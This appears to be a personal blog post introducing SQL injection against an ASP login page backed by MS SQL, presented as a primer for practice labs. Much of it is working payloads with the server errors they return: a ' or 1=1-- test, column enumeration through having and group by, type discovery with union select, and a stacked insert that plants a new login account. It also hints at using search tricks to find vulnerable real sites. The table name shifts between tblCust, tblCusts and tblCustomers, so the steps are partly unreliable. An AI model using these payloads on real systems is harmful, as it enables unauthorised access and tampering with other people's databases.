So firstly, let me just say that this is by no means a “How To” post on SQL Injection. This is more of a very basic primer, or an introduction to SQL Injection. Secondly, I would like to thank the guys at Offensive Security for the following information (I hope this isn’t stepping on anyone’s toes – this is my take on the whole concept), it’s a topic covered in the Pentesting with BackTrack course they have on offer. Finally, please don’t try this on anyone’s systems!! If you want to learn more about this please get something like webgoat or configure your own server to practice this on!! One last thing, I will not go into detail here with how/why some of these things work, wikipedia and a host of other sites can explain this all a lot better then me (i’m no SQL injection expert) and there are many many books (big scary books) that will walk you through this concept. With that out of the road .. let’s move on
Now firstly, you want to be able to test a site for the SQL Injection vulnerability. To do this, go to a site (that you feel may be vulnerable – i’m sure you could use some ninja type googling skills to make things easier) and put the following code into the Username field. (We’ll be assuming you’re running this against an ASP page that goes to a MS SQL backend)
NOTE: For some reason when I post “- -” it shows as a single “-”. All these commands require a double dash “- -”
' or 1=1--
If your site is vulnerable you will receive an error page with an error type of “Unclosed quotation mark before the character string ” and some_string=” (or very similar – some_string will be different). Good work, we’re in business!!
Next, we want to start enumerating tables. We can do this by replacing our previous command with the folowing
' having 1=1--
We should get an error similar (but not the same – the asp pages will differ) stating the following error.
Error Type:
Microsoft OLE DB Provider for SQL Server (0x80040E14)
Column 'tblCust.cust_id' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
/login-off.asp, line 11
AWESOME!! Our first table and column is identified!! tblCustomers.cust.id
Let’s keep enumerating them shall we?? We now change our command to a “Group by ” command and we can start stringing our column names together. Each time we discover a new column name we add it to the group by command and discover a new column. When we have discovered all the columns we should get a failed login attempt. you can follow this through the following few command and errors that follow
' group by tblCust.cust_id having 1=1--
Error Type:
Microsoft OLE DB Provider for SQL Server (0x80040E14)
Column 'tblCust.cust_name' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
' group by tblCust.cust_id, tblCust.cust_name having 1=1--
Error Type:
Microsoft OLE DB Provider for SQL Server (0x80040E14)
Column 'tblCust.cust_password' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
' group by tblCust.cust_id, tblCust.cust_name, tblCust.cust_password having 1=1--
Error Type:
Microsoft OLE DB Provider for SQL Server (0x80040E14)
Column 'tblCust.cust_account' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
' group by tblCust.cust_id, tblCust.cust_name, tblCust.cust_password, tblCust.cust_account having 1=1--
We now get no more errors and a failed login attempt, we have enumerated all our column names.
Next, we want to enumerate all of the column types. We do this so that when we later exploit this vulnerability, we can ensure that the data we try to push into a particular column matches what it is expecting.
We do this using the union select command. You can see it in use below, we do this for each of the column names we previously enumerated.
' union select sum(cust_id) from tblCust --
Error Type:
Microsoft OLE DB Provider for SQL Server (0x80040E07)
The sum or average aggregate operation cannot take a varchar data type as an argument.
TYPE=varchar
' union select sum(cust_name) from tblCusts --
Error Type:
Microsoft OLE DB Provider for SQL Server (0x80040E07)
The sum or average aggregate operation cannot take a varchar data type as an argument.
TYPE=varchar
' union select sum(cust_password) from tblCusts --
Error Type:
Microsoft OLE DB Provider for SQL Server (0x80040E07)
The sum or average aggregate operation cannot take a varchar data type as an argument.
TYPE=varchar
' union select sum(cust_account) from tblCust --
Error Type:
Microsoft OLE DB Provider for SQL Server (0x80040E07)
The sum or average aggregate operation cannot take a varchar data type as an argument.
TYPE=varchar
EXCELLENT! We now have the table name, the column names, and the column types.
Let’s try and add a user to the database now mwhahahahahahahaha! We use the following command to do this
'; insert into tblCustomers values('55555','crudtastic','lazy_pass','bwahaha')--
cust_id = 55555
cust_name = crudtastic
cust_password = lazy_pass
cust_account = bwahaha
Now let’s see if you can now log into the server with your newly created username and password
IT WORKS!!! Right On!!
So where do we go from here .. good question! The world is your oyster right now!! Well, maybe not really, but you get the idea. There are many MANY more things you can do on a compromised server (your own server of course). Your mission now, if you choose to accept it, it to do some research on the internet and see where you can take this. If you can do something cool with it, drop me a line, i’d love to hear about it!
Please make sure you use this responsibly though .. I know I sound like your mum, but trust me I don’t look anywhere as good as her!
Comments
Leave a comment Trackback